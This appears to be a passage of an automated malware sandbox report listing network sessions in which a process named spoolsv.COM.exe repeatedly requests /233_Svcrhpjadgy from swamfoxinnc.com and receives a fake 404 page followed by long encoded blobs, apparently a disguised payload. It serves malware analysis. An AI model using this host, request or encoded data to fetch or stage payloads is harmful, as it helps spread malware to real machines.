                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:15 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:15 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.1049973176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:17 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:18 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:18 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:18 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:18 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:18 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:18 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.1049982176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:20 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:22 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:21 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:22 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:22 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:22 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:22 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.1049994176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:24 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:25 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:25 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:25 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:25 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:25 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.1050001176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:27 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:29 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:29 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:29 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
